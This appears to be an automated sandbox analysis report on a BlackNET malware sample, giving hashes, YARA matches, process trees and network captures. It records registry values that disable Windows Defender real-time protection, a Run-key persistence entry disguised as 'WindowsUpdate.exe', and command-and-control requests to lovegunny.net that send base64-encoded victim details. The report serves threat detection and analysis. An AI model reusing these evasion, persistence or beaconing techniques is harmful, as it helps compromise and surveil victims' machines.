Analysis
max time kernel: 120s
max time network: 118s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64 arch:x86 image:win10v2004-20241007-en locale:en-us os:windows10-2004-x64 system
submitted: 23-10-2024 11:34
Behavioral task: behavioral1
Sample: 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe
Resource: win7-20240903-en
Behavioral task: behavioral2
Sample: 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe
Resource: win10v2004-20241007-en
General
Target: 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe
Size: 80KB
MD5: 05644c696c4cfcd50af83ac4e2f1ff50
SHA1: b6cc01ee14e43facaccf9bfa7007481bb1e04751
SHA256: 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7
SHA512: ae9b804d75feb586909a9b030fc9cdbeb1f6c733d8ba43cd3b099e41993bb9eb6399f896725c810a0e1827ded330295cfe88626ec6a15935a13c5185dd7a4fab
SSDEEP: 1536:dPvK/3zvzVQtCsscKvWBjzJxuOmb54vHTL6lm:diqCspZzVmb5uHv6lm
Malware Config
Signatures
BlackNET payload 1 IoCs
resource: behavioral2/files/0x000e000000023a84-18.dat
yara_rule: family_blacknet

Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as real-time monitoring, block at first sight, etc.
resource: behavioral2/files/0x000e000000023a84-18.dat
yara_rule: disable_win_def

Modifies Windows Defender Real-time Protection settings
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe
Executes dropped EXE 1 IoCs
pid | Process
3264 | WindowsUpdate.exe
Adds Run key to start application 2 TTPs 1 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cde2f914e4cce7f13b2c1cec7b6da970 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Microsoft\\MyClient\\WindowsUpdate.exe" | 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process | entries
4132 | 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe | 40
3356 | powershell.exe | 2
3264 | WindowsUpdate.exe | 22
Suspicious use of AdjustPrivilegeToken 4 IoCs
description | pid | Process
Token: SeDebugPrivilege | 4132 | 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe
Token: SeDebugPrivilege | 3356 | powershell.exe
Token: SeDebugPrivilege | 3264 | WindowsUpdate.exe
Token: SeDebugPrivilege | 8 | powershell.exe
Suspicious use of WriteProcessMemory 6 IoCs
description | pid | Process | procid_target
PID 4132 wrote to memory of 3356 | 4132 | 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe | 90
PID 4132 wrote to memory of 3356 | 4132 | 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe | 90
PID 4132 wrote to memory of 3264 | 4132 | 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe | 92
PID 4132 wrote to memory of 3264 | 4132 | 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe | 92
PID 3264 wrote to memory of 8 | 3264 | WindowsUpdate.exe | 94
PID 3264 wrote to memory of 8 | 3264 | WindowsUpdate.exe | 94
Processes
-
C:\Users\Admin\AppData\Local\Temp\302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe" (level 1)
- Modifies Windows Defender Real-time Protection settings
- Checks computer location settings
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 4132
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "powershell" Get-MpPreference -verbose (level 2)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 3356

C:\Users\Admin\AppData\Local\Temp\Microsoft\MyClient\WindowsUpdate.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\Microsoft\MyClient\WindowsUpdate.exe" (level 2)
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 3264
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "powershell" Get-MpPreference -verbose (level 3)
- Suspicious use of AdjustPrivilegeToken
PID: 8
Network
-
Remote address: 8.8.8.8:53
Request: 209.205.72.20.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: lovegunny.net IN A
Response: lovegunny.net IN A 103.27.237.159
-
GET https://lovegunny.net//connection.php?data=SGFjS2VkX0REQTlERjEzfEJOfEhHTkJXQkdXfEJOfE1pY3Jvc29mdCBXaW5kb3dzIDEwIFByb3xCTnxOL0F8Qk58T25saW5lfEJOfG5vfEJOfEFkbWluaXN0cmF0b3I=
Process: 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe
Remote address: 103.27.237.159:443
Request:
GET //connection.php?data=SGFjS2VkX0REQTlERjEzfEJOfEhHTkJXQkdXfEJOfE1pY3Jvc29mdCBXaW5kb3dzIDEwIFByb3xCTnxOL0F8Qk58T25saW5lfEJOfG5vfEJOfEFkbWluaXN0cmF0b3I= HTTP/1.1
Host: lovegunny.net
Connection: Keep-Alive
Response:
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: http://localhost:3000
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Credentials: true
Date: Wed, 23 Oct 2024 11:34:56 GMT
Content-Length: 1245
-
GET https://lovegunny.net//receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEz
Process: 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe
Remote address: 103.27.237.159:443
Request:
GET //receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEz HTTP/1.1
Host: lovegunny.net
Response:
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: http://localhost:3000
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Credentials: true
Date: Wed, 23 Oct 2024 11:34:56 GMT
Content-Length: 1245
-
GET https://lovegunny.net//getCommand.php?id=SGFjS2VkX0REQTlERjEz
Process: 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe
Remote address: 103.27.237.159:443
Request:
GET //getCommand.php?id=SGFjS2VkX0REQTlERjEz HTTP/1.1
Host: lovegunny.net
Response:
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: http://localhost:3000
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Credentials: true
Date: Wed, 23 Oct 2024 11:34:56 GMT
Content-Length: 1245
-
Remote address: 8.8.8.8:53
Request: 140.32.126.40.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: 159.237.27.103.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: 95.221.229.192.in-addr.arpa IN PTR
Response: (empty)
-
GET https://lovegunny.net//connection.php?data=SGFjS2VkX0REQTlERjEzfEJOfEhHTkJXQkdXfEJOfE1pY3Jvc29mdCBXaW5kb3dzIDEwIFByb3xCTnxOL0F8Qk58T25saW5lfEJOfG5vfEJOfEFkbWluaXN0cmF0b3I=
Process: WindowsUpdate.exe
Remote address: 103.27.237.159:443
Request:
GET //connection.php?data=SGFjS2VkX0REQTlERjEzfEJOfEhHTkJXQkdXfEJOfE1pY3Jvc29mdCBXaW5kb3dzIDEwIFByb3xCTnxOL0F8Qk58T25saW5lfEJOfG5vfEJOfEFkbWluaXN0cmF0b3I= HTTP/1.1
Host: lovegunny.net
Connection: Keep-Alive
Response:
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: http://localhost:3000
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Credentials: true
Date: Wed, 23 Oct 2024 11:34:59 GMT
Content-Length: 1245
-
GET https://lovegunny.net//receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEz
Process: WindowsUpdate.exe
Remote address: 103.27.237.159:443
Request:
GET //receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEz HTTP/1.1
Host: lovegunny.net
Response:
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: http://localhost:3000
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Credentials: true
Date: Wed, 23 Oct 2024 11:35:00 GMT
Content-Length: 1245
-
Remote address: 103.27.237.159:443
Request:
GET //getCommand.php?id=SGFjS2VkX0REQTlERjEz HTTP/1.1
Host: lovegunny.net
Response:
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: http://localhost:3000
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Credentials: true
Date: Wed, 23 Oct 2024 11:35:00 GMT
Content-Length: 1245
-
GET https://lovegunny.net//receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEz
Process: WindowsUpdate.exe
Remote address: 103.27.237.159:443
Request:
GET //receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEz HTTP/1.1
Host: lovegunny.net
Response:
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: http://localhost:3000
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Credentials: true
Date: Wed, 23 Oct 2024 11:35:00 GMT
Content-Length: 1245
-
Remote address: 8.8.8.8:53
Request: 56.163.245.4.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: 18.31.95.13.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: 99.209.201.84.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: 77.190.18.2.in-addr.arpa IN PTR
Response: 77.190.18.2.in-addr.arpa IN PTR a2-18-190-77.deploy.static.akamaitechnologies.com
-
Remote address: 8.8.8.8:53
Request: 205.47.74.20.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: 172.210.232.199.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: 11.227.111.52.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: tse1.mm.bing.net IN A
Response:
tse1.mm.bing.net IN CNAME mm-mm.bing.net.trafficmanager.net
mm-mm.bing.net.trafficmanager.net IN CNAME ax-0001.ax-msedge.net
ax-0001.ax-msedge.net IN A 150.171.28.10
ax-0001.ax-msedge.net IN A 150.171.27.10
-
GET https://tse1.mm.bing.net/th?id=OADD2.10239340418610_1CWE7N9O9P5V6VACF&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
Remote address: 150.171.28.10:443
Request:
GET /th?id=OADD2.10239340418610_1CWE7N9O9P5V6VACF&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
Response:
HTTP/2.0 200
content-length: 673255
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: AE10BA836F1E40609CB3644ED6232B77 Ref B: LON601060105029 Ref C: 2024-10-23T11:36:46Z
date: Wed, 23 Oct 2024 11:36:46 GMT
-
GET https://tse1.mm.bing.net/th?id=OADD2.10239398629842_1ZAQRRM6HYDFONDBE&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
Remote address: 150.171.28.10:443
Request:
GET /th?id=OADD2.10239398629842_1ZAQRRM6HYDFONDBE&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
Response:
HTTP/2.0 200
content-length: 668226
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: AA745BDB1228441D8161E1E5421BB41A Ref B: LON601060105029 Ref C: 2024-10-23T11:36:47Z
date: Wed, 23 Oct 2024 11:36:47 GMT
-
GET https://tse1.mm.bing.net/th?id=OADD2.10239360422984_1O5I4N56JBATVHLO0&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
Remote address: 150.171.28.10:443
Request:
GET /th?id=OADD2.10239360422984_1O5I4N56JBATVHLO0&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
Response:
HTTP/2.0 200
content-length: 944899
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 3F65CA758BBA43F2A4FA8E6F88C5EBE1 Ref B: LON601060105029 Ref C: 2024-10-23T11:36:47Z
date: Wed, 23 Oct 2024 11:36:47 GMT
-
GET https://tse1.mm.bing.net/th?id=OADD2.10239340418609_1GWNOVIVAOEBFVIZK&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
Remote address: 150.171.28.10:443
Request:
GET /th?id=OADD2.10239340418609_1GWNOVIVAOEBFVIZK&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
Response:
HTTP/2.0 200
content-length: 579336
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 10432A1722B0409BA88A038D88889B27 Ref B: LON601060105029 Ref C: 2024-10-23T11:36:47Z
date: Wed, 23 Oct 2024 11:36:47 GMT
-
GET https://tse1.mm.bing.net/th?id=OADD2.10239398629830_1RPYGH00DJD1WMKQO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
Remote address: 150.171.28.10:443
Request:
GET /th?id=OADD2.10239398629830_1RPYGH00DJD1WMKQO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
Response:
HTTP/2.0 200
content-length: 761345
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 9A882466A33B49C89EF50A6F5B09EEE0 Ref B: LON601060105029 Ref C: 2024-10-23T11:36:47Z
date: Wed, 23 Oct 2024 11:36:47 GMT
-
GET https://tse1.mm.bing.net/th?id=OADD2.10239360422982_1TJDRH7G9FF9FQQY2&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
Remote address: 150.171.28.10:443
Request:
GET /th?id=OADD2.10239360422982_1TJDRH7G9FF9FQQY2&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
Response:
HTTP/2.0 200
content-length: 837003
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 6FFCCED3731B42B19DDE5EFEC91DC819 Ref B: LON601060105029 Ref C: 2024-10-23T11:36:47Z
date: Wed, 23 Oct 2024 11:36:47 GMT
-
Remote address: 8.8.8.8:53
Request: 10.28.171.150.in-addr.arpa IN PTR
Response: (empty)
-
103.27.237.159:443 | https://lovegunny.net//getCommand.php?id=SGFjS2VkX0REQTlERjEz | tls, http | 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe | 1.3kB 8.8kB 12 11
HTTP Request: GET https://lovegunny.net//connection.php?data=SGFjS2VkX0REQTlERjEzfEJOfEhHTkJXQkdXfEJOfE1pY3Jvc29mdCBXaW5kb3dzIDEwIFByb3xCTnxOL0F8Qk58T25saW5lfEJOfG5vfEJOfEFkbWluaXN0cmF0b3I=
HTTP Response: 404
HTTP Request: GET https://lovegunny.net//receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEz
HTTP Response: 404
HTTP Request: GET https://lovegunny.net//getCommand.php?id=SGFjS2VkX0REQTlERjEz
HTTP Response: 404
-
103.27.237.159:443 | https://lovegunny.net//getCommand.php?id=SGFjS2VkX0REQTlERjEz | tls, http | WindowsUpdate.exe | 1.4kB 8.9kB 13 12
HTTP Request: GET https://lovegunny.net//connection.php?data=SGFjS2VkX0REQTlERjEzfEJOfEhHTkJXQkdXfEJOfE1pY3Jvc29mdCBXaW5kb3dzIDEwIFByb3xCTnxOL0F8Qk58T25saW5lfEJOfG5vfEJOfEFkbWluaXN0cmF0b3I=
HTTP Response: 404
HTTP Request: GET https://lovegunny.net//receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEz
HTTP Response: 404
HTTP Request: GET https://lovegunny.net//getCommand.php?id=SGFjS2VkX0REQTlERjEz
HTTP Response: 404
-
103.27.237.159:443 | https://lovegunny.net//receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEz | tls, http | WindowsUpdate.exe | 698 B 1.9kB 7 5
HTTP Request: GET https://lovegunny.net//receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEz
HTTP Response: 404
-
150.171.28.10:443 | https://tse1.mm.bing.net/th?id=OADD2.10239360422982_1TJDRH7G9FF9FQQY2&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 | tls, http2 | 157.9kB 4.6MB 3344 3339
HTTP Request: GET https://tse1.mm.bing.net/th?id=OADD2.10239340418610_1CWE7N9O9P5V6VACF&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
HTTP Response: 200
HTTP Request: GET https://tse1.mm.bing.net/th?id=OADD2.10239398629842_1ZAQRRM6HYDFONDBE&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
HTTP Response: 200
HTTP Request: GET https://tse1.mm.bing.net/th?id=OADD2.10239360422984_1O5I4N56JBATVHLO0&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
HTTP Request: GET https://tse1.mm.bing.net/th?id=OADD2.10239340418609_1GWNOVIVAOEBFVIZK&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
HTTP Request: GET https://tse1.mm.bing.net/th?id=OADD2.10239398629830_1RPYGH00DJD1WMKQO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
HTTP Request: GET https://tse1.mm.bing.net/th?id=OADD2.10239360422982_1TJDRH7G9FF9FQQY2&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
HTTP Response: 200
HTTP Response: 200
HTTP Response: 200
HTTP Response: 200
-
72 B 158 B 1 1
DNS Request
209.205.72.20.in-addr.arpa
-
59 B 75 B 1 1
DNS Request
lovegunny.net
DNS Response
103.27.237.159
-
72 B 158 B 1 1
DNS Request
140.32.126.40.in-addr.arpa
-
73 B 123 B 1 1
DNS Request
159.237.27.103.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
56.163.245.4.in-addr.arpa
-
70 B 144 B 1 1
DNS Request
18.31.95.13.in-addr.arpa
-
72 B 132 B 1 1
DNS Request
99.209.201.84.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
77.190.18.2.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
205.47.74.20.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.210.232.199.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
11.227.111.52.in-addr.arpa
-
62 B 170 B 1 1
DNS Request
tse1.mm.bing.net
DNS Response
150.171.28.10
150.171.27.10
-
72 B 158 B 1 1
DNS Request
10.28.171.150.in-addr.arpa
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution (1)
Registry Run Keys / Startup Folder (1)
Create or Modify System Process (1)
Windows Service (1)
Downloads
Filesize: 2KB
MD5: d85ba6ff808d9e5444a4b369f5bc2730
SHA1: 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Filesize: 944B
MD5: 77d622bb1a5b250869a3238b9bc1402b
SHA1: d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256: f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512: d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Filesize: 80KB
MD5: 05644c696c4cfcd50af83ac4e2f1ff50
SHA1: b6cc01ee14e43facaccf9bfa7007481bb1e04751
SHA256: 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7
SHA512: ae9b804d75feb586909a9b030fc9cdbeb1f6c733d8ba43cd3b099e41993bb9eb6399f896725c810a0e1827ded330295cfe88626ec6a15935a13c5185dd7a4fab

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82